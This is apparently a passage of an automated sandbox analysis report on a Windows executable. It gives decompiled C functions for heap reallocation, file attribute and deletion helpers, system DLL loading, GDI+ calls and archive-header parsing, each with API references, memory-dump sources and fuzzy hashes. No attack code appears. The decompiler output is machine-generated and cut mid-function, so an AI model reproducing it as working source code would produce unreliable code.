                0x00ca9926
                0x00ca9948
                0x00ca9957
                0x00ca9962
                0x00000000
                0x00ca996e
                0x00000000
                0x00ca996e

                APIs
                • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 00CA9957
                • GetLastError.KERNEL32 ref: 00CA9964
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ErrorFileLastPointer
                • String ID:
                • API String ID: 2976181284-0
                • Opcode ID: f3d265c710cc88c79bd38f4af02211160b4afaff4f0ed21a6dda91ba805e8dae
                • Instruction ID: dd9035f928c214ea0df76fc5616b34dfb6a5fee2e2b9200b3fe40ea3913e5b0a
                • Opcode Fuzzy Hash: f3d265c710cc88c79bd38f4af02211160b4afaff4f0ed21a6dda91ba805e8dae
                • Instruction Fuzzy Hash: 5B01B532211102AB8F188E369C866BF7759EF93338705421DE93E8B251DB30DD019660
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC7B78, Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 96%
                			E00CC7B78(void* __ecx, void* __edx, void* _a4, long _a8) {
				void* __esi;
				void* _t4;
				long _t7;
				void* _t9;
				void* _t13;
				void* _t14;
				long _t16;

				_t13 = __edx;
				_t10 = __ecx;
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(_t16 <= 0xffffffe0) {
							while(1) {
								_t4 = RtlReAllocateHeap( *0xd00874, 0, _t14, _t16); // executed
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E00CC7906();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E00CC6763(_t10, _t13, _t16, __eflags, _t16);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E00CC7ECC())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E00CC7A50(_t14);
					goto L6;
				}
				_t9 = E00CC7A8A(__ecx, _a8); // executed
				return _t9;
			}










                0x00cc7b78
                0x00cc7b78
                0x00cc7b7e
                0x00cc7b83
                0x00cc7b91
                0x00cc7b94
                0x00cc7b96
                0x00cc7ba1
                0x00cc7ba4
                0x00cc7bcb
                0x00cc7bd5
                0x00cc7bdb
                0x00cc7bdd
                0x00000000
                0x00000000
                0x00cc7bbc
                0x00cc7bbe
                0x00000000
                0x00000000
                0x00cc7bc1
                0x00cc7bc6
                0x00cc7bc7
                0x00cc7bc9
                0x00000000
                0x00000000
                0x00cc7bc9
                0x00cc7bb3
                0x00000000
                0x00cc7bb3
                0x00cc7ba6
                0x00cc7bab
                0x00cc7bb1
                0x00cc7bb1
                0x00cc7bb1
                0x00000000
                0x00cc7bb1
                0x00cc7b99
                0x00000000
                0x00cc7b9e
                0x00cc7b88
                0x00000000

                APIs
                • _free.LIBCMT ref: 00CC7B99
                  • Part of subcall function 00CC7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CC2FA6,?,0000015D,?,?,?,?,00CC4482,000000FF,00000000,?,?), ref: 00CC7ABC
                • RtlReAllocateHeap.NTDLL(00000000,?,?,?,?,00CE00E0,00CACB18,?,?,?,?,?,?), ref: 00CC7BD5
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AllocateHeap$_free
                • String ID:
                • API String ID: 1482568997-0
                • Opcode ID: 432045b48ea94d6bcb1927250874f4c41c08bce01464bda973c39a731a3879c5
                • Instruction ID: 079d187d3bf822a8b1086fa6102ad307198bbff12a8449e9ac22cb92b840078f
                • Opcode Fuzzy Hash: 432045b48ea94d6bcb1927250874f4c41c08bce01464bda973c39a731a3879c5
                • Instruction Fuzzy Hash: 04F06D326092166BDB213A26DC51F6F3768DF91BB0B15435EFC28AA190DB30DE40ADA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB0574, Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CB0574(void* __ecx) {
				long _v8;
				long _v12;
				int _t8;
				void* _t14;
				signed int _t15;
				signed int _t17;

				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
				if(_t8 == 0) {
					return _t8 + 1;
				}
				_t14 = 0;
				_t17 = _v8;
				_t15 = 1;
				do {
					if((_t17 & _t15) != 0) {
						_t14 = _t14 + 1;
					}
					_t15 = _t15 + _t15;
				} while (_t15 != 0);
				if(_t14 >= 1) {
					return _t14;
				}
				return 1;
			}









                0x00cb0588
                0x00cb0590
                0x00000000
                0x00cb0592
                0x00cb0597
                0x00cb059b
                0x00cb059e
                0x00cb05a0
                0x00cb05a2
                0x00cb05a4
                0x00cb05a4
                0x00cb05a5
                0x00cb05a5
                0x00cb05ac
                0x00000000
                0x00cb05ae
                0x00cb05b3

                APIs
                • GetCurrentProcess.KERNEL32(?,?), ref: 00CB0581
                • GetProcessAffinityMask.KERNEL32(00000000), ref: 00CB0588
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Process$AffinityCurrentMask
                • String ID:
                • API String ID: 1231390398-0
                • Opcode ID: 7f8d65e319cf2ab954cf0cb3f2610aaf1bf8fcb2ef5dc7fc83c09a32609a0299
                • Instruction ID: 68060654bd4a58567edc4a1390f2f36ae80b9282638149e00753e03ea1db0316
                • Opcode Fuzzy Hash: 7f8d65e319cf2ab954cf0cb3f2610aaf1bf8fcb2ef5dc7fc83c09a32609a0299
                • Instruction Fuzzy Hash: 81E09232E11209AB9F288AA49C059FF739DDA58301F30517AA912D3B00F934EE054BB8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CAA12F, Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E00CAA12F(WCHAR* _a4, long _a8) {
				short _v4100;
				int _t12;
				signed int _t18;
				signed int _t19;

				E00CBD940();
				_push(_t18);
				_t12 = SetFileAttributesW(_a4, _a8); // executed
				_t19 = _t18 & 0xffffff00 | _t12 != 0x00000000;
				if(_t19 == 0 && E00CAB32C(_a4,  &_v4100, 0x800) != 0) {
					_t19 = _t19 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
				}
				return _t19;
			}







                0x00caa137
                0x00caa13c
                0x00caa143
                0x00caa14b
                0x00caa150
                0x00caa17c
                0x00caa17c
                0x00caa185

                APIs
                • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CA9F65,?,?,?,00CA9DFE,?,00000001,00000000,?,?), ref: 00CAA143
                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CA9F65,?,?,?,00CA9DFE,?,00000001,00000000,?,?), ref: 00CAA174
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 961a077d33538227bd2cfcd3ff21178c9ae2ba84bb80da7551640356aeff4575
                • Instruction ID: 91418085ff8e7ceaddbd1079109526e6f7cf892f28d12376ea7458ae7960f056
                • Opcode Fuzzy Hash: 961a077d33538227bd2cfcd3ff21178c9ae2ba84bb80da7551640356aeff4575
                • Instruction Fuzzy Hash: 3DF0A03114120ABBDF015F60DC00BEE376CAB15385F848061BD8C86161EB32DE99EE90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBCB57, Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ItemText_swprintf
                • String ID:
                • API String ID: 3011073432-0
                • Opcode ID: f0b13aeabe007b8cffb20d5b92bbdd0f504b0d3168650d03e368915f49499b96
                • Instruction ID: 81ed948af4fe5252cb583fb35882fe66ee983ff1143fcf8e6c2f77e6d47b6e89
                • Opcode Fuzzy Hash: f0b13aeabe007b8cffb20d5b92bbdd0f504b0d3168650d03e368915f49499b96
                • Instruction Fuzzy Hash: FAF0EC7190434827EB11AB709C47FDD3B5D9705742F040496BA06560A2E5715A205761
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA9E18, Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E00CA9E18(WCHAR* _a4) {
				short _v4100;
				int _t10;
				signed int _t16;
				signed int _t17;

				E00CBD940();
				_push(_t16);
				_t10 = DeleteFileW(_a4); // executed
				_t17 = _t16 & 0xffffff00 | _t10 != 0x00000000;
				if(_t17 == 0 && E00CAB32C(_a4,  &_v4100, 0x800) != 0) {
					_t17 = _t17 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
				}
				return _t17;
			}







                0x00ca9e20
                0x00ca9e25
                0x00ca9e29
                0x00ca9e31
                0x00ca9e36
                0x00ca9e5f
                0x00ca9e5f
                0x00ca9e68

                APIs
                • DeleteFileW.KERNELBASE(?,?,?,00CA9648,?,?,00CA94A3), ref: 00CA9E29
                • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00CA9648,?,?,00CA94A3), ref: 00CA9E57
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: DeleteFile
                • String ID:
                • API String ID: 4033686569-0
                • Opcode ID: 5007d109e38f1e0dba2088e1e9494df850d4d0975f1a1a1a69027f617b73453a
                • Instruction ID: ddb8e3843d87a0a171145861ed9e19f327d180ef25b4ea15c68b544ffee605a5
                • Opcode Fuzzy Hash: 5007d109e38f1e0dba2088e1e9494df850d4d0975f1a1a1a69027f617b73453a
                • Instruction Fuzzy Hash: 71E0923154220A6BEB119F60DC45FEE775CEF19382F884062B988C3162DF71DD95EA60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA9E7F, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CA9E7F(WCHAR* _a4) {
				short _v4100;
				long _t6;
				long _t11;
				long _t13;

				E00CBD940();
				_t6 = GetFileAttributesW(_a4); // executed
				_t13 = _t6;
				if(_t13 == 0xffffffff && E00CAB32C(_a4,  &_v4100, 0x800) != 0) {
					_t11 = GetFileAttributesW( &_v4100); // executed
					_t13 = _t11;
				}
				return _t13;
			}







                0x00ca9e87
                0x00ca9e90
                0x00ca9e96
                0x00ca9e9b
                0x00ca9ebc
                0x00ca9ec2
                0x00ca9ec2
                0x00ca9eca

                APIs
                • GetFileAttributesW.KERNELBASE(?,?,?,00CA9E74,?,00CA74F7,?,?,?,?), ref: 00CA9E90
                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00CA9E74,?,00CA74F7,?,?,?,?), ref: 00CA9EBC
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 705b9977843fcc8a13eb0c658a008fd3b1d6d845052c136912eb56ff833ce8c2
                • Instruction ID: c7038f8aff1483b70cec1ab0b8b9c61322d8e254eb33b947239c24c91a3505e8
                • Opcode Fuzzy Hash: 705b9977843fcc8a13eb0c658a008fd3b1d6d845052c136912eb56ff833ce8c2
                • Instruction Fuzzy Hash: 82E09B3150111857CB10AB68DC05BD9779CDB193E5F004162FD54D3191DB709D459AE0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CAFCFD, Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CAFCFD(intOrPtr _a4) {
				short _v4100;
				struct HINSTANCE__* _t7;

				E00CBD940();
				_t7 = GetSystemDirectoryW( &_v4100, 0x800);
				if(_t7 != 0) {
					E00CAB625( &_v4100, _a4,  &_v4100, 0x800);
					_t7 = LoadLibraryW( &_v4100); // executed
				}
				return _t7;
			}





                0x00cafd05
                0x00cafd18
                0x00cafd20
                0x00cafd2e
                0x00cafd3a
                0x00cafd3a
                0x00cafd44

                APIs
                • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CAFD18
                • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAE7F6,Crypt32.dll,?,00CAE878,?,00CAE85C,?,?,?,?), ref: 00CAFD3A
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: DirectoryLibraryLoadSystem
                • String ID:
                • API String ID: 1175261203-0
                • Opcode ID: eeb51130bd147c1d67cd343a1beceb43f9fe5ecab95ef0e6764c237a836f8b4c
                • Instruction ID: 1e660b7309b2f94b40ec12ba45bc9e5f1be854805abde675f2d37e8ca2206320
                • Opcode Fuzzy Hash: eeb51130bd147c1d67cd343a1beceb43f9fe5ecab95ef0e6764c237a836f8b4c
                • Instruction Fuzzy Hash: 62E0127690111C6ADB219A959C48FEA776CEF09392F4440A6B948D2005DA74EA40CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB938E, Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                Download Yara Rule
                C-Code - Quality: 73%
                			E00CB938E(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _t10;
				signed int _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t10 =  &_v8;
				_v8 = __ecx;
				_v8 = _v8 & 0x00000000;
				_push(_t10);
				_push(_a4);
				 *__ecx = 0xcd3398;
				if(_a8 == 0) {
					L00CBD80E(); // executed
				} else {
					L00CBD814();
				}
				 *((intOrPtr*)(_t15 + 8)) = _t10;
				 *(_t15 + 4) = _v8;
				return _t15;
			}






                0x00cb9391
                0x00cb9393
                0x00cb9395
                0x00cb9398
                0x00cb939b
                0x00cb93a3
                0x00cb93a4
                0x00cb93a7
                0x00cb93ad
                0x00cb93b6
                0x00cb93af
                0x00cb93af
                0x00cb93af
                0x00cb93bb
                0x00cb93c1
                0x00cb93ca

                APIs
                • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CB93AF
                • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00CB93B6
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: BitmapCreateFromGdipStream
                • String ID:
                • API String ID: 1918208029-0
                • Opcode ID: 05ed6702918ce70db82dbc8ea2b4c3f5801b8dba5f659ba6298b833316a39f58
                • Instruction ID: 80dad13b887ef6e78120a7548cca9b97f01cb5ac237a26ddebe8fb2edb7a04be
                • Opcode Fuzzy Hash: 05ed6702918ce70db82dbc8ea2b4c3f5801b8dba5f659ba6298b833316a39f58
                • Instruction Fuzzy Hash: 3CE06D71800218EBCB20DF99C5016D9B7F8EB08321F10805BE84993350E771AE04ABA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB9B08, Relevance: 3.0, APIs: 2, Instructions: 22comCOMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E00CB9B08(void* __ecx) {
				intOrPtr _v16;
				intOrPtr* _t5;
				void* _t7;
				void* _t11;
				intOrPtr _t14;

				 *[fs:0x0] = _t14;
				_t5 =  *0xce75c0; // 0x7442c100
				 *((intOrPtr*)( *_t5 + 8))(_t5, _t11,  *[fs:0x0], E00CD1161, 0xffffffff);
				L00CBD826(); // executed
				_t7 =  *0xcddff0( *((intOrPtr*)(__ecx + 4))); // executed
				 *[fs:0x0] = _v16;
				return _t7;
			}








                0x00cb9b19
                0x00cb9b20
                0x00cb9b2b
                0x00cb9b31
                0x00cb9b36
                0x00cb9b3f
                0x00cb9b4a

                APIs
                • GdiplusShutdown.GDIPLUS(?,?,?,00CD1161,000000FF), ref: 00CB9B31
                • OleUninitialize.OLE32(?,?,?,00CD1161,000000FF), ref: 00CB9B36
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: GdiplusShutdownUninitialize
                • String ID:
                • API String ID: 3856339756-0
                • Opcode ID: 0b70b0cb30d16a6b4822ed8f1c82260bf3824c5abace1fea3c336a567149e8ce
                • Instruction ID: e4073294957c0c7ec5d02d222f5c25706580bf017fcd70dfa29a3f5cdae8d16a
                • Opcode Fuzzy Hash: 0b70b0cb30d16a6b4822ed8f1c82260bf3824c5abace1fea3c336a567149e8ce
                • Instruction Fuzzy Hash: CBE04F72948644EFC710DF88DC46B5AB7E8FB08B20F04476AF91A83B90DB356800CBD1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC1726, Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                Download Yara Rule
                C-Code - Quality: 89%
                			E00CC1726(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t9;

				_t1 = E00CC281A(__eflags, E00CC166A); // executed
				 *0xcdd680 = _t1;
				if(_t1 != 0xffffffff) {
					_t2 = E00CC28C8(__eflags, _t1, 0xd001dc);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E00CC1759(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}






                0x00cc172b
                0x00cc1730
                0x00cc1739
                0x00cc1744
                0x00cc174a
                0x00cc174b
                0x00cc174d
                0x00cc1758
                0x00cc174f
                0x00cc174f
                0x00000000
                0x00cc174f
                0x00cc173b
                0x00cc173b
                0x00cc173d
                0x00cc173d

                APIs
                  • Part of subcall function 00CC281A: try_get_function.LIBVCRUNTIME ref: 00CC282F
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CC1744
                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00CC174F
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                • String ID:
                • API String ID: 806969131-0
                • Opcode ID: 0796dc0155661929616a6f7f85ad1bc951f6934d6e2601285eb742bc19ac8294
                • Instruction ID: 2a1ebc55dddd3aab4a592b48943cb2e274de0ab30d08fc117c8e4d8c45e47bd8
                • Opcode Fuzzy Hash: 0796dc0155661929616a6f7f85ad1bc951f6934d6e2601285eb742bc19ac8294
                • Instruction Fuzzy Hash: EAD0A926E84301188E002A72E812F491B4888137703E84A5EF830CA0C3EA348086B226
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA12B2, Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E00CA12B2(struct HWND__* _a4, int _a8, signed char _a12) {
				int _t8;

				asm("sbb eax, eax");
				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
				return _t8;
			}




                0x00ca12b9
                0x00ca12ce
                0x00ca12d4

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ItemShowWindow
                • String ID:
                • API String ID: 3351165006-0
                • Opcode ID: b62b654be0af036abe4802acade36ebc416812e8e4818a76114cd45b17a19329
                • Instruction ID: d9b210ab711f76ace60d5eaa7db8091cddf209e8f803d07b1324c74838cef8ad
                • Opcode Fuzzy Hash: b62b654be0af036abe4802acade36ebc416812e8e4818a76114cd45b17a19329
                • Instruction Fuzzy Hash: B9C01272898202BECB011BB0DC09F2EBBA8EBA4212F04C90AB0B7C00A0C238C010DB11
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA1973, Relevance: 1.8, APIs: 1, Instructions: 285COMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E00CA1973(intOrPtr* __ecx, intOrPtr __edx) {
				signed int _t106;
				intOrPtr _t109;
				signed int _t110;
				signed int _t112;
				signed int _t116;
				signed int _t119;
				signed int _t127;
				intOrPtr _t128;
				char _t129;
				char _t138;
				intOrPtr _t143;
				signed int _t144;
				signed int _t145;
				void* _t147;
				signed int _t152;
				signed int _t153;
				signed int _t155;
				void* _t159;
				void* _t160;
				signed int _t166;
				intOrPtr* _t169;
				signed int _t175;
				void* _t176;
				signed int _t178;
				char* _t190;
				intOrPtr _t191;
				intOrPtr _t197;
				intOrPtr* _t199;
				signed int _t202;
				void* _t204;
				char* _t205;
				intOrPtr _t206;
				void* _t207;

				_t197 = __edx;
				_t169 = __ecx;
				E00CBD870(E00CD1451, _t207);
				_t199 = _t169;
				_push(7);
				_t164 = _t199 + 0x21f8;
				_push(_t199 + 0x21f8);
				 *((char*)(_t199 + 0x6cbc)) = 0;
				 *((char*)(_t199 + 0x6cc4)) = 0;
				if( *((intOrPtr*)( *_t199 + 0xc))() == 7) {
					 *(_t199 + 0x6cc0) =  *(_t199 + 0x6cc0) & 0x00000000;
					_t106 = E00CA1D09(_t164, 7);
					__eflags = _t106;
					if(_t106 == 0) {
						E00CA6ED7(_t207 - 0x38, 0x200000);
						 *(_t207 - 4) =  *(_t207 - 4) & 0x00000000;
						_t109 =  *((intOrPtr*)( *_t199 + 0x14))();
						_t197 =  *_t199;
						 *((intOrPtr*)(_t207 - 0x18)) = _t109;
						_t110 =  *((intOrPtr*)(_t197 + 0xc))( *((intOrPtr*)(_t207 - 0x38)),  *((intOrPtr*)(_t207 - 0x34)) + 0xfffffff0);
						_t175 = _t110;
						_t202 = 0;
						 *(_t207 - 0x14) = _t175;
						_t166 = 1;
						__eflags = _t175;
						if(_t175 <= 0) {
							L22:
							__eflags =  *(_t199 + 0x6cc0);
							_t176 = _t207 - 0x38;
							if( *(_t199 + 0x6cc0) != 0) {
								_t37 = _t207 - 4; // executed
								 *_t37 =  *(_t207 - 4) | 0xffffffff;
								__eflags =  *_t37;
								E00CA159C(_t176); // executed
								L25:
								_t112 =  *(_t199 + 0x6cb0);
								__eflags = _t112 - 4;
								if(__eflags != 0) {
									__eflags = _t112 - 3;
									if(_t112 != 3) {
										 *((intOrPtr*)(_t199 + 0x2200)) = 7;
										L32:
										 *((char*)(_t207 - 0xd)) = 0;
										__eflags = E00CA391A(_t199, _t197);
										 *(_t207 - 0xe) = 0;
										__eflags = 0 - 1;
										if(0 != 1) {
											L38:
											_t116 =  *((intOrPtr*)(_t207 - 0xd));
											L39:
											_t178 =  *((intOrPtr*)(_t199 + 0x6cc5));
											__eflags = _t178;
											if(_t178 == 0) {
												L41:
												__eflags =  *((char*)(_t199 + 0x6cc4));
												if( *((char*)(_t199 + 0x6cc4)) != 0) {
													L43:
													__eflags = _t178;
													if(__eflags == 0) {
														E00CA134C(__eflags, 0x1b, _t199 + 0x1e);
													}
													__eflags =  *((char*)(_t207 + 8));
													if( *((char*)(_t207 + 8)) != 0) {
														L48:
														__eflags =  *(_t207 - 0xe);
														 *((char*)(_t199 + 0x6cb6)) =  *((intOrPtr*)(_t199 + 0x2224));
